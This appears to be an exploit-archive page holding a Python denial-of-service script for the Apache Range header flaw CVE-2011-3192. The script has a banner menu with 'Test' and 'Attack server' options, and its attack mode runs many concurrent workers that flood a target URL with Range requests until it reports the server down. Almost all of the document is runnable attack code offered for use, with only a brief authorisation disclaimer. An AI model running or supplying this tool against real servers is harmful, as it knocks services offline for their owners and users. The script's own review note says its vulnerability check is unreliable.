4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
import argparse
import aiohttp
import asyncio
from colorama import Fore
import signal


class ApacheRangeDosExploiter:
    """Send HTTP ``Range`` requests to one URL to probe CVE-2011-3192.

    Only run this against systems you own or are explicitly authorised to
    test.
    """

    def __init__(self, target_url, processes):
        """Store the target and the concurrency settings.

        Args:
            target_url: URL that every request is sent to.
            processes: Worker multiplier. One asyncio task is created per
                (process, byte range) pair; no OS processes are spawned.
        """
        self.target_url = target_url
        self.processes = processes
        # Byte ranges requested, one per request, via the Range header.
        self.byte_ranges = ["0-1023", "1024-2047", "2048-3071"]
        # Worker tasks that are currently running. The module's SIGINT
        # handler iterates this list to cancel them.
        self.active_tasks = []

    @staticmethod
    def intro():
        """Print the coloured banner and option menu."""
        print(Fore.CYAN + '____________________________')
        print(Fore.CYAN + '| Exploit by futurefkslaves |')
        print(Fore.CYAN + '____________________________')
        print(Fore.GREEN + '|   Please select options   |')
        print(Fore.YELLOW + '| 1.   Test CVE-2011-3192   |')
        print(Fore.RED + '| 2.    Attack server       |')
        print(Fore.RED + '|  enter CTRL+C for exit    |')
        print(Fore.RED + '_____________________________')

    async def test_server_vulnerability(self):
        """Request each configured byte range once and print the outcome.

        A 206 response is reported as vulnerable; any other status is
        reported as not vulnerable for that range. Client errors and
        timeouts are printed and the next range is tried.

        NOTE(review): a 206 to a single satisfiable range only shows that the
        server honours Range requests. Treat a "vulnerable" result as a hint
        and confirm it against the server version / vendor advisory.
        """
        async with aiohttp.ClientSession() as session:
            for byte_range in self.byte_ranges:
                headers = {"Range": "bytes=" + byte_range}
                try:
                    async with session.get(self.target_url, headers=headers) as response:
                        if response.status == 206:
                            print(Fore.GREEN + "Server is vulnerable to CVE-2011-3192")
                        else:
                            print(Fore.RED + f"Server is not vulnerable with byte range: {byte_range}")
                # A timeout is not an aiohttp.ClientError; catch it as well so
                # one slow range does not abort the remaining checks.
                except (aiohttp.ClientError, asyncio.TimeoutError) as e:
                    print(Fore.RED + f"Error occurred while testing byte range {byte_range}: {e}")

    async def exploit_byte_range(self, session, byte_range):
        """Request one byte range in a loop until the server stops serving it.

        The loop ends when the response status is 500, 404, 400 or 502, or
        when aiohttp raises a client error (which is printed, not re-raised).

        Args:
            session: Open ``aiohttp.ClientSession`` shared by all workers.
            byte_range: Range value such as ``"0-1023"`` (without ``bytes=``).
        """
        headers = {"Range": "bytes=" + byte_range}
        try:
            while True:
                async with session.get(self.target_url, headers=headers) as response:
                    if response.status == 206:
                        print(Fore.GREEN + "Successfully attacked")
                    elif response.status in [500, 404, 400, 502]:
                        print(Fore.YELLOW + f"Server down with status code {response.status}")
                        return
                    else:
                        print(Fore.RED + "Request failed")
        except aiohttp.ClientError as e:
            print(Fore.RED + f"Error occurred while sending request in ({byte_range}): {e}")

    async def _run_workers(self, session):
        """Run one worker task per (process, byte range) pair and wait for them.

        The tasks are published in ``self.active_tasks`` while they run so an
        external handler can cancel them, and the list is emptied afterwards.
        """
        tasks = [
            asyncio.create_task(self.exploit_byte_range(session, byte_range))
            for _ in range(self.processes)
            for byte_range in self.byte_ranges
        ]
        self.active_tasks = tasks
        try:
            await asyncio.gather(*tasks)
        except asyncio.CancelledError:
            pass
        finally:
            # gather() returns as soon as one worker raises; stop the others
            # and wait for them so none is left using a closed session.
            pending = [task for task in tasks if not task.done()]
            for task in pending:
                task.cancel()
            if pending:
                await asyncio.gather(*pending, return_exceptions=True)
            self.active_tasks = []

    async def exploit_apache_range_dos(self):
        """Open one shared client session and run all worker tasks in it."""
        async with aiohttp.ClientSession() as session:
            await self._run_workers(session)


def exit_handler(signum, frame):
    """Signal handler: cancel tracked tasks, stop the loop and exit.

    Relies on the module-level ``exploiter`` and ``loop`` objects that the
    ``__main__`` section creates before registering this handler.

    Args:
        signum: Signal number passed by the ``signal`` module (unused).
        frame: Interrupted stack frame (unused).

    Raises:
        SystemExit: Always, to terminate the program.
    """
    print(Fore.RED + "Exiting...")
    # Ask every task the exploiter is tracking to cancel.
    for pending_task in exploiter.active_tasks:
        pending_task.cancel()
    loop.stop()
    raise SystemExit()


if __name__ == "__main__":
    # Created first: exit_handler refers to this module-level loop.
    loop = asyncio.get_event_loop()

    parser = argparse.ArgumentParser(description="Apache Range Header DoS Exploiter")
    parser.add_argument("target", help="Target URL to test/exploit")
    parser.add_argument("processes", type=int, help="Number of concurrent attack processes")
    args = parser.parse_args()

    exploiter = ApacheRangeDosExploiter(args.target.strip(), args.processes)
    exploiter.intro()
    signal.signal(signal.SIGINT, exit_handler)

    try:
        option = input("Enter the option : ").strip()
    except (KeyboardInterrupt, EOFError):
        # EOFError covers a closed or empty stdin, which input() raises.
        raise SystemExit

    # Menu option -> coroutine function to run.
    actions = {
        "1": exploiter.test_server_vulnerability,
        "2": exploiter.exploit_apache_range_dos,
    }

    try:
        action = actions.get(option)
        if action is None:
            print(Fore.RED + "Invalid option. Please select a valid option.")
        else:
            try:
                loop.run_until_complete(action())
            except Exception as exc:
                # Report the failure instead of exiting silently with status 0.
                print(Fore.RED + f"Aborted: {exc}")
                raise SystemExit(1) from exc

        # Only wait when there really are tasks left to wait for.
        if exploiter.active_tasks:
            loop.run_until_complete(asyncio.gather(*exploiter.active_tasks))
    finally:
        loop.close()